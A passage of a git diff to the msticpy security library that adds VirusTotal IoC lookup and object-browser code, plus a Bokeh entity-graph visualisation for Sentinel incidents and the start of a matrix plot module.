+        pd.DataFrame
+            Any objects with specified `relationship` to the entity
+
+        Notes
+        -----
+        This method returns full related objects rather than ID links.
+        It is less efficient than looking up ID links only.
+
+        See Also
+        --------
+        lookup_ioc_relationships : return the related IDs.
+
+        """
+        try:
+            return _make_sync(
+                self._lookup_ioc_relationships_async(
+                    observable,
+                    vt_type,
+                    relationship,
+                    limit,
+                    all_props=True,
+                    full_objects=True,
+                )
+            )
+        finally:
+            self._vt_client.close()
+
+    async def _lookup_iocs_relationships_async(
+        self,
+        observables_df: pd.DataFrame,
+        relationship: str,
+        observable_column: str = ColumnNames.TARGET.value,
+        observable_type_column: str = ColumnNames.TARGET_TYPE.value,
+        limit: int = None,
+        all_props: bool = False,
+    ) -> pd.DataFrame:
+        """
+        Look up and single IoC observable relationships.
+
+        Parameters
+        ----------
+        observables_df: pd.DataFrame
+            A Pandas DataFrame, where each row is an observable
+        relationship: str
+            Desired relationship
+        observable_column:
+            ID column of each observable
+        observable_type_column:
+            Type column of each observable.
+        limit: int
+            Relations limit
+        all_props : bool, optional
+            If True, return all properties, by default False
+
+        Returns
+        -------
+            Future Relationship Pandas DataFrame with the relationships of each observable.
+
+        Raises
+        ------
+        KeyError
+            Column not found in observables_df
+
+        """
+        _observables_df = observables_df.reset_index()
+
+        for column in [observable_column, observable_type_column]:
+            if column not in _observables_df.columns:
+                raise KeyError(f"Column {column} not found in observables df")
+
+        observables_list = _observables_df[observable_column]
+        types_list = _observables_df[observable_type_column]
+        dfs_futures = []
+
+        for observable, observable_type in zip(observables_list, types_list):
+            try:
+                dfs_futures.append(
+                    self._lookup_ioc_relationships_async(
+                        observable,
+                        observable_type,
+                        relationship,
+                        limit,
+                        all_props=all_props,
+                    )
+                )
+            except KeyError:
+                print(
+                    "ERROR:\t It was not possible to get the data for",
+                    f"{observable_type} {observable}",
+                )
+        dfs = await asyncio.gather(*dfs_futures)
+        return (
+            pd.concat(dfs)
+            if len(dfs) > 0
+            else self._relation_not_found_df(
+                vt_type=", ".join(types_list),
+                observable=", ".join(observables_list),
+                relationship=relationship,
+            )
+        )
+
+    def lookup_iocs_relationships(
+        self,
+        observables_df: pd.DataFrame,
+        relationship: str,
+        observable_column: str = ColumnNames.TARGET.value,
+        observable_type_column: str = ColumnNames.TARGET_TYPE.value,
+        limit: int = None,
+        all_props: bool = False,
+    ) -> pd.DataFrame:
+        """
+        Look up and single IoC observable relationships.
+
+        Parameters
+        ----------
+        observables_df: pd.DataFrame
+            A Pandas DataFrame, where each row is an observable
+        relationship: str
+            Desired relationship
+        observable_column:
+            ID column of each observable
+        observable_type_column:
+            Type column of each observable.
+        limit: int
+            Relations limit
+        all_props : bool, optional
+            If True, return all properties, by default False
+
+        Returns
+        -------
+            Relationship Pandas DataFrame with the relationships of each observable.
+
+        """
+        try:
+            return _make_sync(
+                self._lookup_iocs_relationships_async(
+                    observables_df,
+                    relationship,
+                    observable_column,
+                    observable_type_column,
+                    limit,
+                    all_props=all_props,
+                )
+            )
+
+        finally:
+            self._vt_client.close()
+
+    # Temporarily disabled due to build break with vt_graph_api dependency
+    # def create_vt_graph(
+    #     self, relationship_dfs: List[pd.DataFrame], name: str, private: bool
+    # ) -> str:
+    #     """
+    #     Create a VirusTotal Graph with a set of Relationship DataFrames.
+
+    #     Parameters
+    #     ----------
+    #     relationship_dfs:
+    #         List of Relationship DataFrames
+    #     name:
+    #         New graph name
+    #     private
+    #         Indicates if the Graph is private or not.
+
+    #     Returns
+    #     -------
+    #         Graph ID
+
+    #     Raises
+    #     ------
+    #         ValueError when private is not indicated.
+    #         ValueError when there are no relationship DataFrames
+    #         MsticpyVTGraphSaveGraphError when Graph can not be saved
+
+    #     """
+    #     if not isinstance(private, bool):
+    #         raise ValueError("Please indicate if Graph is private or not")
+
+    #     nodes, edges = self.relationships_to_graph(relationship_dfs)
+    #     graph = VTGraph(self._vt_key, name=name, private=private)
+    #     graph.add_nodes(nodes)
+
+    #     for edge in edges:
+    #         graph.add_link(**edge)
+
+    #     try:
+    #         graph.save_graph()
+    #     except vt_graph_errs.SaveGraphError as graph_err:
+    #         graph_mssg = (
+    #             [""]
+    #             if not private
+    #             else [
+    #                 "Please check you have Private Graph premium feature enabled in",
+    #                 "your subscription. It is possible to create public Graphs",
+    #                 "with 'private=False' input argument",
+    #             ]
+    #         )
+    #         raise MsticpyVTGraphSaveGraphError(
+    #             "Could not save Graph.",
+    #             *graph_mssg,
+    #         ) from graph_err
+
+    #     return graph.graph_id
+
+    def get_object(self, vt_id: str, vt_type: str) -> pd.DataFrame:
+        """
+        Return the full VT object as a DataFrame.
+
+        Parameters
+        ----------
+        vt_id : str
+            The ID of the object
+        vt_type : str
+            The type of object to query.
+
+        Returns
+        -------
+        pd.DataFrame
+            Single column DataFrame with attribute names as
+            index and values as data column.
+
+        Raises
+        ------
+        KeyError
+            Unrecognized VT Type
+        MsticpyVTNoDataError
+            Error requesting data from VT.
+
+        Notes
+        -----
+        This calls the underlying VT get_object API directly and
+        returns all attributes for the object - hence a very wide
+        DataFrame.
+
+        """
+        if VTEntityType(vt_type) not in self._SUPPORTED_VT_TYPES:
+            # pylint: disable=no-member
+            raise KeyError(
+                f"Property type {vt_type} not supported",
+                "Valid types are",
+                ", ".join(x.value for x in VTEntityType.__members__.values()),
+            )
+            # pylint: enable=no-member
+
+        endpoint_name = self._get_endpoint_name(vt_type)
+        try:
+            response: vt.object.Object = self._vt_client.get_object(
+                f"/{endpoint_name}/{vt_id}"
+            )
+            result_df = pd.DataFrame(
+                {
+                    "id": [response.id],
+                    "type": [response.type],
+                }
+            )
+            attribs = pd.json_normalize(response.to_dict()["attributes"])
+            result_df = pd.concat([result_df, attribs], axis=1)
+            result_df["context_attributes"] = response.to_dict().get(
+                "context_attributes"
+            )
+            return timestamps_to_utcdate(result_df)
+        except vt.APIError as err:
+            if err.args and err.args[0] == VT_API_NOT_FOUND:
+                return self._item_not_found_df(vt_type, vt_id)
+            raise MsticpyVTNoDataError(
+                "An error occurred requesting data from VirusTotal"
+            ) from err
+        finally:
+            self._vt_client.close()
+
+    def get_file_behavior(
+        self,
+        file_id: Optional[str] = None,
+        file_summary: Optional[Dict[str, Any]] = None,
+        sandbox: Optional[str] = None,
+    ) -> VTFileBehavior:
+        """
+        Return a VTFileBehavior object with file detonation results.
+
+        Parameters
+        ----------
+        file_id : Optional[str], optional
+            The ID of the file to look up, by default None
+        file_summary : Optional[Dict[str, Any]], optional
+            VT file summary object dictionary, by default None
+        sandbox : str, optional
+            Name of specific sandbox to retrieve, by default None
+            If None, it will retrieve the behavior summary.
+
+        Returns
+        -------
+        VTFileBehavior
+
+        """
+        vt_behavior = VTFileBehavior(
+            self._vt_key, file_id=file_id, file_summary=file_summary
+        )
+        vt_behavior.get_file_behavior(sandbox=sandbox)
+        return vt_behavior
+
+    @staticmethod
+    def relationships_to_graph(
+        relationship_dfs: List[pd.DataFrame],
+    ) -> Tuple[List[Dict[str, Any]], List[Dict[str, Any]]]:
+        """
+        Generate nodes and edges from relationships.
+
+        Parameters
+        ----------
+        relationship_dfs : List[pd.DataFrame]
+            List of relationship DataFrames
+
+        Returns
+        -------
+        Tuple[List[Dict[str, Any]], List[Dict[str, Any]]]
+            List of nodes (node_id, node_type)
+            List of edges (source_node, target_node, connection_type)
+
+        Raises
+        ------
+        ValueError
+            If an empty list is supplied.
+
+        """
+        if not relationship_dfs:
+            raise ValueError("There are no relationship DataFrames")
+
+        # Set indexes to source-target so that pd.concat aligns on these indexes
+        relationship_dfs = [
+            rel_df.set_index([ColumnNames.SOURCE.value, ColumnNames.TARGET.value])
+            for rel_df in relationship_dfs
+        ]
+        concatenated_df = pd.concat(relationship_dfs).reset_index()
+
+        # Create nodes DF, with source and target
+        sources_df = (
+            concatenated_df.groupby(ColumnNames.SOURCE.value)[
+                ColumnNames.SOURCE_TYPE.value
+            ]
+            .first()
+            .reset_index()
+            .rename(
+                columns={
+                    ColumnNames.SOURCE.value: ColumnNames.ID.value,
+                    ColumnNames.SOURCE_TYPE.value: ColumnNames.TYPE.value,
+                }
+            )
+        )
+
+        target_df = (
+            concatenated_df.groupby(ColumnNames.TARGET.value)[
+                ColumnNames.TARGET_TYPE.value
+            ]
+            .first()
+            .reset_index()
+            .rename(
+                columns={
+                    ColumnNames.TARGET.value: ColumnNames.ID.value,
+                    ColumnNames.TARGET_TYPE.value: ColumnNames.TYPE.value,
+                }
+            )
+        )
+
+        nodes_df = pd.concat([sources_df, target_df])
+        nodes = [
+            {
+                "node_id": row[ColumnNames.ID.value],
+                "node_type": row[ColumnNames.TYPE.value],
+            }
+            for row in nodes_df.itertuples(index=False)
+        ]
+
+        edges = [
+            {
+                "source_node": row[ColumnNames.SOURCE.value],
+                "target_node": row[ColumnNames.TARGET.value],
+                "connection_type": row[ColumnNames.RELATIONSHIP_TYPE.value],
+            }
+            for row in concatenated_df.itertuples(index=False)
+        ]
+        return nodes, edges
+
+    @staticmethod
+    def render_vt_graph(graph_id: str, width: int = 800, height: int = 600):
+        """
+        Display a VTGraph in a Jupyter Notebook.
+
+        Parameters
+        ----------
+        graph_id:
+            Graph ID
+        width
+            Graph width.
+        height
+            Graph height
+
+        """
+        display(
+            HTML(
+                f"""
+              <iframe
+                src="https://www.virustotal.com/graph/embed/{graph_id}"
+                width="{width}"
+                height="{height}">
+              </iframe>
+
+            """
+            )
+        )
+
+    @classmethod
+    def _item_not_found_df(cls, vt_type: str, observable: str):
+        not_found_dict = {
+            ColumnNames.ID.value: observable,
+            ColumnNames.TYPE.value: vt_type,
+        }
+        vte_type = VTEntityType(vt_type)
+        if vte_type not in cls._SUPPORTED_VT_TYPES:
+            not_found_dict["status"] = "Unsupported type"
+        else:
+            not_found_dict.update(
+                {key: "Not found" for key in cls._BASIC_PROPERTIES_PER_TYPE[vte_type]}
+            )
+        return pd.DataFrame([not_found_dict])
+
+    @classmethod
+    def _relation_not_found_df(cls, vt_type: str, observable: str, relationship: str):
+        not_found_dict = {
+            ColumnNames.SOURCE.value: observable,
+            ColumnNames.SOURCE_TYPE.value: vt_type,
+            ColumnNames.RELATIONSHIP_TYPE.value: relationship,
+            ColumnNames.TARGET.value: "Not found",
+            ColumnNames.TARGET_TYPE.value: "Not found",
+        }
+        return pd.DataFrame([not_found_dict])
+
+
+def _get_vt_api_key() -> Optional[str]:
+    """Retrieve the VT key from settings."""
+    prov_settings = get_provider_settings("TIProviders")
+    vt_settings = prov_settings.get("VirusTotal")
+    if vt_settings:
+        return vt_settings.args.get("AuthKey")
+    return None
+
+
+def timestamps_to_utcdate(data: pd.DataFrame):
+    """Replace Unix timestamps in VT data with Py/pandas Timestamp."""
+    for date_col in (col for col in data.columns if col.endswith("_date")):
+        data[date_col] = pd.to_datetime(data[date_col], unit="s", utc=True)
+    return data
diff --git a/msticpy/sectools/vtlookupv3/vtobject_browser.py b/msticpy/sectools/vtlookupv3/vtobject_browser.py
new file mode 100644
index 000000000..ee40807db
--- /dev/null
+++ b/msticpy/sectools/vtlookupv3/vtobject_browser.py
@@ -0,0 +1,141 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""VirusTotal Object browser."""
+import pprint
+from typing import Dict, Optional
+
+import ipywidgets as widgets
+import pandas as pd
+
+from ..._version import VERSION
+from ...nbtools.nbwidgets import IPyDisplayMixin
+from .vtlookupv3 import VTLookupV3, timestamps_to_utcdate
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+_NOT_FOUND = "Not found"
+
+_BORDER_LAYOUT = widgets.Layout(
+    **{
+        "width": "90%",
+        "border": "solid gray 1px",
+        "margin": "1pt",
+        "padding": "5pt",
+    }
+)
+
+
+class VTObjectBrowser(IPyDisplayMixin):
+    """VirusTotal object attributes browser."""
+
+    _BASIC_TITLE = "VirusTotal File hash lookup"
+
+    def __init__(self, file_id: Optional[str] = None):
+        """
+        Initialize the VT Browser.
+
+        Parameters
+        ----------
+        file_id : Optional[str], optional
+            File ID (Hash) of file to be retrieved and displayed, by default None
+
+        """
+        self._vt = VTLookupV3()
+        self._current_data: pd.DataFrame = pd.DataFrame()
+
+        self.data_sel = widgets.Select(
+            description="Attribute", layout=widgets.Layout(height="400px")
+        )
+        self.data_view = widgets.Textarea(
+            description="Value", layout=widgets.Layout(height="400px", width="60%")
+        )
+        self.data_sel.observe(self._display_attribute, names="value")
+
+        self.txt_file_id = widgets.Text(
+            description="Enter file ID (hash)",
+            layout=widgets.Layout(width="70%"),
+            style={"description_width": "150px"},
+            value=file_id or "",
+        )
+
+        self.btn_lookup = widgets.Button(description="Lookup")
+        self.btn_lookup.on_click(self._lookup_file_id)
+
+        self.html_header = widgets.HTML(
+            _summary_html(self._BASIC_TITLE, _extract_summary()), layout=_BORDER_LAYOUT
+        )
+
+        self.hb_file_lookup = widgets.HBox(
+            [self.txt_file_id, self.btn_lookup], layout=_BORDER_LAYOUT
+        )
+        self.hb_vt_attribs = widgets.HBox(
+            [self.data_sel, self.data_view], layout=_BORDER_LAYOUT
+        )
+        self.layout = widgets.VBox(
+            [self.html_header, self.hb_file_lookup, self.hb_vt_attribs]
+        )
+        if file_id:
+            self.btn_lookup.click()
+
+    def _display_attribute(self, change):
+        """Display selected attribute in TextArea."""
+        item = change.get("new")
+        if item in self._current_data.columns:
+            data = self._current_data.iloc[0][item]
+            self.data_view.value = pprint.pformat(data)
+        else:
+            self.data_view.value = ""
+
+    def _lookup_file_id(self, btn):
+        """Handle lookup button click."""
+        del btn
+
+        self._current_data = self._vt.get_object(self.txt_file_id.value, vt_type="file")
+        self.html_header.value = _summary_html(
+            self._BASIC_TITLE, _extract_summary(self._current_data)
+        )
+        if (
+            "first_submission_date" not in self._current_data.columns
+            or self._current_data.iloc[0]["first_submission_date"] == _NOT_FOUND
+        ):
+            self.data_sel.options = []
+            return
+        self._current_data = timestamps_to_utcdate(self._current_data)
+        self.data_sel.options = self._current_data.columns
+
+
+def _extract_summary(data: Optional[pd.DataFrame] = None) -> Dict[str, str]:
+    """Return summary of item."""
+    def_dict = {"sha256": "", "meaningful_name": "", "names": "", "magic": ""}
+    if data is None:
+        return def_dict
+    if (
+        "first_submission_date" not in data.columns
+        or data.iloc[0]["first_submission_date"] == _NOT_FOUND
+    ):
+        def_dict["sha256"] = _NOT_FOUND
+        return def_dict
+    return data[["sha256", "meaningful_name", "names", "magic"]].iloc[0].to_dict()
+
+
+def _summary_html(title: str, summary: Dict[str, str]) -> str:
+    """Return HTML formatted summary."""
+    return f"""
+    <h3>{title}</h3>
+    <table>
+    <tr>
+        <td>ID</td><td>{summary.get('sha256')}</td>
+    </tr>
+    <tr>
+        <td>Names</td><td>{summary.get('names')}</td>
+    </tr>
+    <tr>
+        <td>File Type</td><td>{summary.get('magic')}</td>
+    </tr>
+    </table>
+    """
diff --git a/msticpy/vis/__init__.py b/msticpy/vis/__init__.py
new file mode 100644
index 000000000..0bcb93704
--- /dev/null
+++ b/msticpy/vis/__init__.py
@@ -0,0 +1,6 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Visualization sub-package."""
diff --git a/msticpy/vis/entity_graph_tools.py b/msticpy/vis/entity_graph_tools.py
new file mode 100644
index 000000000..09947aa34
--- /dev/null
+++ b/msticpy/vis/entity_graph_tools.py
@@ -0,0 +1,511 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Creates an entity graph for a Microsoft Sentinel Incident."""
+from datetime import datetime
+from typing import List, Optional, Union
+
+import numpy as np
+import networkx as nx
+import pandas as pd
+from bokeh.io import output_notebook, show
+from bokeh.layouts import column
+from bokeh.models import LayoutDOM
+from bokeh.plotting import figure, from_networkx
+from bokeh.models import Circle, HoverTool, Label
+
+from .._version import VERSION
+from ..common.exceptions import MsticpyUserError
+from ..datamodel.entities import Entity
+from ..datamodel.entities.alert import Alert
+from ..datamodel.soc.incident import Incident
+from ..nbtools.security_alert import SecurityAlert
+from ..nbtools.timeline import display_timeline
+from ..nbtools.timeline_duration import display_timeline_duration
+
+__version__ = VERSION
+__author__ = "Pete Bryan"
+
+req_alert_cols = ["DisplayName", "Severity", "AlertType"]
+req_inc_cols = ["id", "name", "properties.severity"]
+
+
+class EntityGraph:
+    """Create a graph for visualizing and tracking links between entities."""
+
+    def __init__(
+        self,
+        entity: Union[Incident, Alert, pd.DataFrame, pd.Series, Entity, SecurityAlert],
+    ):
+        """
+        Create a new instance of the entity graph.
+
+        Parameters
+        ----------
+        entity : Union[Incident, Alert, pd.DataFrame, pd.Series, Entity, SecurityAlert]
+            The initial item to add to the graph.
+            Can be an Incident, Alert, SecurityAlert or other Entity
+
+        """
+        output_notebook()
+        self.alertentity_graph = nx.Graph(id="IncidentGraph")
+        if isinstance(entity, (Incident, Alert)):
+            self._add_incident_or_alert_node(entity)
+        elif isinstance(entity, pd.DataFrame):
+            self.add_incident(entity)
+        elif isinstance(entity, pd.Series):
+            self.add_incident(entity.to_frame().T)
+        elif isinstance(entity, Entity):
+            self._add_entity_node(entity)
+        elif isinstance(entity, SecurityAlert):
+            entity = Alert(entity)  # type: ignore
+            self._add_incident_or_alert_node(entity)
+
+    def plot(self, hide: bool = False, timeline: bool = False, **kwargs) -> LayoutDOM:
+        """
+        Plot a graph of entities.
+
+        Parameters
+        ----------
+        hide : bool, optional
+            Set true to not display the graphic, by default False
+        timeline : bool, optional
+            Set to True to display a timeline, by default False
+        node_size : int, optional
+            Size of the nodes in pixels, by default 25
+        font_size : int, optional
+            Font size for node labels, by default 10
+            Can be an integer (point size) or a string (e.g. "10pt")
+        width : int, optional
+            Width in pixels, by default 800
+        height : int, optional
+            Image height (the default is 800)
+        scale : int, optional
+            Position scale (the default is 2)
+
+        Returns
+        -------
+        LayoutDOM
+            A Bokeh figure object
+
+        """
+        if timeline:
+            return self._plot_with_timeline(hide=hide, **kwargs)
+        return self._plot_no_timeline(hide=hide, **kwargs)
+
+    def _plot_no_timeline(self, hide: bool = False, **kwargs) -> LayoutDOM:
+        """
+        Plot a graph of entities.
+
+        Parameters
+        ----------
+        hide : bool, optional
+            Set true to not display the graphic, by default False
+
+        Returns
+        -------
+        LayoutDOM
+            A Bokeh figure object
+
+        """
+        return plot_entitygraph(self.alertentity_graph, hide=hide, **kwargs)
+
+    def _plot_with_timeline(self, hide: bool = False, **kwargs) -> LayoutDOM:
+        """
+        Plot the entity graph with a timeline.
+
+        Parameters
+        ----------
+        hide : bool, optional
+            Set true to not display the graphic, by default False
+
+        Returns
+        -------
+        LayoutDOM
+            A Bokeh figure object
+
+        """
+        timeline = None
+        tl_df = self.to_df()
+        tl_type = "duration"
+        if len(tl_df["EndTime"].unique()) == 1 and not tl_df["EndTime"].unique()[0]:
+            tl_type = "discreet"
+            if (
+                len(tl_df["TimeGenerated"].unique()) == 1
+                and not tl_df["TimeGenerated"].unique()[0]
+            ):
+                print("No timestamps available to create timeline")
+                return self._plot_no_timeline(timeline=False, hide=hide, **kwargs)
+        tl_df["TimeGenerated"] = pd.to_datetime(tl_df["TimeGenerated"], utc=True)
+        tl_df["StartTime"] = pd.to_datetime(tl_df["StartTime"], utc=True)
+        tl_df["EndTime"] = pd.to_datetime(tl_df["EndTime"], utc=True)
+        graph = self._plot_no_timeline(hide=True, **kwargs)
+        if tl_type == "duration":
+            timeline = display_timeline_duration(
+                tl_df.dropna(subset=["TimeGenerated"]),
+                group_by="Name",
+                title="Entity Timeline",
+                time_column="StartTime",
+                end_time_column="EndTime",
+                source_columns=["Name", "Description", "Type", "TimeGenerated"],
+                hide=True,
+                width=800,
+            )
+        elif tl_type == "discreet":
+            timeline = display_timeline(
+                tl_df.dropna(subset=["TimeGenerated"]),
+                group_by="Type",
+                title="Entity Timeline",
+                time_column="TimeGenerated",
+                source_columns=["Name", "Description", "Type", "TimeGenerated"],
+                hide=True,
+                width=800,
+            )
+        plot_layout = column(graph, timeline) if timeline else graph
+        if not hide:
+            show(plot_layout)
+        return plot_layout
+
+    def add_entity(self, ent: Entity, attached_to: str = None):
+        """
+        Add an entity to the graph.
+
+        Parameters
+        ----------
+        ent : Entity
+            The entity object to add the graph
+        attached_to : str, optional
+            The name of the node to attach the entity to, by default None
+
+        """
+        self._add_entity_node(ent, attached_to)
+
+    def add_incident(self, incident: Union[Incident, Alert, pd.DataFrame]):
+        """
+        Add another incident or set of incidents to the graph.
+
+        Parameters
+        ----------
+        incident : Union[Incident, Alert, pd.DataFrame]
+            This can be an alert, and incident or a DataFrame of alerts or incidents
+
+        """
+        inc = None
+        if isinstance(incident, pd.DataFrame):
+            for row in incident.iterrows():
+                if "name" in row[1]:
+                    inc = Incident(src_event=row[1])  # type: ignore
+                elif "AlertName" in row[1]:
+                    inc = Alert(src_event=row[1])  # type: ignore
+                self._add_incident_or_alert_node(inc)
+        else:
+            self._add_incident_or_alert_node(incident)
+
+    def add_note(
+        self,
+        name: str,
+        description: Optional[str] = None,
+        attached_to: Union[str, List] = None,
+    ):
+        """
+        Add a node to the graph representing a note or comment.
+
+        Parameters
+        ----------
+        name : str
+            The name of the node to add
+        description : Optional[str], optional
+            A description of the note, by default None
+        attached_to : Union[str, List], optional
+            What existing nodes on the graph to attach it the note to, by default None
+        user: str, optional
+            What user to associate the note with
+
+        """
+        self.alertentity_graph.add_node(
+            name,
+            Name=name,
+            Description=description,
+            Type="analystnote",
+            TimeGenerated=datetime.now(),
+        )
+        if attached_to:
+            if isinstance(attached_to, str):
+                attached_to = [attached_to]
+            for link in attached_to:
+                self.add_link(name, link)
+
+    def add_link(self, source: str, target: str):
+        """
+        Add a link between 2 nodes on the graph.
+
+        Parameters
+        ----------
+        source : str
+            Name of node to link from
+        target : str
+            Name of node to link to
+
+        Raises
+        ------
+        MsticpyUserError
+            If nodes aren't present in the graph
+
+
+        """
+        # Check names are present
+        if (
+            source in self.alertentity_graph.nodes()
+            and target in self.alertentity_graph.nodes()
+        ):
+            self.alertentity_graph.add_edge(source, target)
+        else:
+            missing = [
+                name
+                for name in [source, target]
+                if name not in self.alertentity_graph.nodes()
+            ]
+            raise MsticpyUserError(title=f"Node(s) {missing} not found in graph")
+
+    def remove_link(self, source: str, target: str):
+        """
+        Remove a link between 2 nodes on the graph.
+
+        Parameters
+        ----------
+        source : str
+            Name of node to remove link from
+        target : str
+            name of node to remove link to
+
+        Raises
+        ------
+        MsticpyUserError
+            If edge isn't present in the graph
+
+        """
+        if (
+            source in self.alertentity_graph.nodes()
+            and target in self.alertentity_graph.nodes()
+            and self.alertentity_graph.has_edge(source, target)
+        ):
+            self.alertentity_graph.remove_edge(source, target)
+        else:
+            raise MsticpyUserError(
+                title=f"No edge exists between {source} and {target}"
+            )
+
+    def remove_node(self, name: str):
+        """
+        Remove a node from the graph.
+
+        Parameters
+        ----------
+        name : str
+            The name of the node to remove.
+
+        """
+        # Check node is present
+        if name in self.alertentity_graph.nodes():
+            self.alertentity_graph.remove_node(name)
+        else:
+            raise MsticpyUserError(f"Node named {name} not found")
+
+    def to_df(self) -> pd.DataFrame:
+        """Generate a dataframe of nodes in the graph."""
+        names = [node[1]["Name"] for node in self.alertentity_graph.nodes.items()]
+        descs = [
+            node[1]["Description"] for node in self.alertentity_graph.nodes.items()
+        ]
+        types = [node[1]["Type"] for node in self.alertentity_graph.nodes.items()]
+        times = [
+            node[1]["TimeGenerated"] if "TimeGenerated" in node[1] else None
+            for node in self.alertentity_graph.nodes.items()
+        ]
+        starttimes = [
+            node[1]["StartTime"] if "StartTime" in node[1] else node[1]["TimeGenerated"]
+            for node in self.alertentity_graph.nodes.items()
+        ]
+        endtimes = [
+            node[1]["EndTime"] if "EndTime" in node[1] else None
+            for node in self.alertentity_graph.nodes.items()
+        ]
+        tl_df = pd.DataFrame(
+            {
+                "Name": names,
+                "Description": descs,
+                "Type": types,
+                "TimeGenerated": times,
+                "EndTime": endtimes,
+                "StartTime": starttimes,
+            }
+        )
+        tl_df.replace("None", np.NaN, inplace=True)
+        return tl_df
+
+    def _add_incident_or_alert_node(self, incident: Union[Incident, Alert, None]):
+        """Check what type of entity is passed in and creates relevent graph."""
+        if isinstance(incident, Incident):
+            self._add_incident_node(incident)
+        elif isinstance(incident, Alert):
+            self._add_alert_node(incident)
+
+    def _add_entity_node(self, ent, attached_to=None):
+        """Add an Entity to the graph."""
+        self.alertentity_graph = nx.compose(self.alertentity_graph, ent.to_networkx())
+        if attached_to:
+            self.add_link(attached_to, ent.name_str)
+
+    def _add_alert_node(self, alert, incident_name=None):
+        """Add an alert entity to the graph."""
+        self.alertentity_graph = nx.compose(self.alertentity_graph, alert.to_networkx())
+        if alert["Entities"]:
+            for ent in alert["Entities"]:
+                self._add_entity_node(ent, alert.name_str)
+        if incident_name:
+            self.add_link(incident_name, alert.name_str)
+
+    def _add_incident_node(self, incident):
+        """Add an incident entity to the graph."""
+        self.alertentity_graph = nx.compose(
+            self.alertentity_graph, incident.to_networkx()
+        )
+        if incident.Alerts:
+            for alert in incident.Alerts:
+                self._add_alert_node(alert, incident.name_str)
+        if incident.Entities:
+            entities = _dedupe_entities(incident.Alerts, incident.Entities)
+            for ent in entities:
+                self._add_entity_node(ent, incident.name_str)
+
+    def _add_entity_edges(self, edges: set, attached_to: str):
+        """Check entity edges and add them."""
+        for edge in edges:
+            if isinstance(edge.target, Entity):
+                if not self.alertentity_graph.has_node(edge.target.name_str):
+                    self._add_entity_node(edge.target)
+                try:
+                    self.add_link(attached_to, edge.target.name_str)
+                except MsticpyUserError:
+                    pass
+
+    @property
+    def graph(self) -> nx.Graph:
+        """Return the raw NetworkX graph."""
+        return self.alertentity_graph
+
+
+def _dedupe_entities(alerts, ents) -> list:
+    """Deduplicate incident and alert entities."""
+    alrt_ents = []
+    for alrt in alerts:
+        if alrt["Entities"]:
+
+            alrt_ents += [ent.__hash__() for ent in alrt["Entities"]]
+    for ent in ents:
+        if ent.__hash__() in alrt_ents:
+            ents.remove(ent)
+    return ents
+
+
+def plot_entitygraph(  # pylint: disable=too-many-locals
+    entity_graph: nx.Graph,
+    node_size: int = 25,
+    font_size: Union[int, str] = 10,
+    height: int = 800,
+    width: int = 800,
+    scale: int = 2,
+    hide: bool = False,
+) -> figure:
+    """
+    Plot entity graph with Bokeh.
+
+    Parameters
+    ----------
+    entity_graph : nx.Graph
+        The entity graph as a networkX graph
+    node_size : int, optional
+        Size of the nodes in pixels, by default 25
+    font_size : int, optional
+        Font size for node labels, by default 10
+        Can be an integer (point size) or a string (e.g. "10pt")
+    width : int, optional
+        Width in pixels, by default 800
+    height : int, optional
+        Image height (the default is 800)
+    scale : int, optional
+        Position scale (the default is 2)
+    hide : bool, optional
+        Don't show the plot, by default False. If True, just
+        return the figure.
+
+    Returns
+    -------
+    bokeh.plotting.figure
+        The network plot.
+
+    """
+    color_map = {
+        "incident": "red",
+        "alert": "orange",
+        "alerts": "orange",
+        "securityalert": "orange",
+        "analystnote": "blue",
+    }
+    output_notebook()
+    font_pnt = f"{font_size}pt" if isinstance(font_size, int) else font_size
+    node_attrs = {}
+    for node, attrs in entity_graph.nodes(data=True):
+        try:
+            color = color_map.get(attrs["Type"].lower(), "green")
+        except KeyError:
+            color = "green"
+        node_attrs.update({node: color})
+
+    nx.set_node_attributes(entity_graph, node_attrs, "node_color")
+
+    plot = figure(
+        title="Alert Entity graph",
+        x_range=(-3, 3),
+        y_range=(-3, 3),
+        width=width,
+        height=height,
+    )
+
+    plot.add_tools(
+        HoverTool(
+            tooltips=[
+                ("Name", "@Name"),
+                ("Description", "@Description"),
+                ("Type", "@Type"),
+            ]
+        )
+    )
+
+    graph_renderer = from_networkx(
+        entity_graph, nx.spring_layout, scale=scale, center=(0, 0)
+    )
+
+    graph_renderer.node_renderer.glyph = Circle(
+        size=node_size, fill_color="node_color", fill_alpha=0.5
+    )
+    # pylint: disable=no-member
+    plot.renderers.append(graph_renderer)
+
+    # Create labels
+    for name, pos in graph_renderer.layout_provider.graph_layout.items():
+        label = Label(
+            x=pos[0],
+            y=pos[1],
+            x_offset=5,
+            y_offset=5,
+            text=name,
+            text_font_size=font_pnt,
+        )
+        plot.add_layout(label)
+    # pylint: enable=no-member
+    if not hide:
+        show(plot)
+    return plot
diff --git a/msticpy/vis/matrix_plot.py b/msticpy/vis/matrix_plot.py
new file mode 100644
index 000000000..475ef4a92
--- /dev/null
+++ b/msticpy/vis/matrix_plot.py
@@ -0,0 +1,314 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Bokeh matrix plot."""
+import math
+from typing import List, Optional, Union
+
+import attr
+from bokeh.io import output_notebook, show, reset_output
+from bokeh.plotting import figure
+from bokeh.models import (
+    HoverTool,
+    ColumnDataSource,
+    LayoutDOM,
+)
+import numpy as np
+import pandas as pd
+
+from ..common.utility import check_kwargs
+from .._version import VERSION
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+@attr.s(auto_attribs=True)
+class PlotParams:
+    """Plot params for time_duration."""
+
+    title: Optional[str] = "Interaction Plot"
+    x: Optional[str] = None
+    x_col: Optional[str] = None
+    y: Optional[str] = None
+    y_col: Optional[str] = None
+    intersect: bool = False
+    height: int = 700
+    width: int = 900
+    color: str = "red"
+    value_col: Optional[str] = None
+    dist_count: bool = False
+    log_size: bool = False
+    invert: bool = False
+    sort: Optional[Union[str, bool]] = None
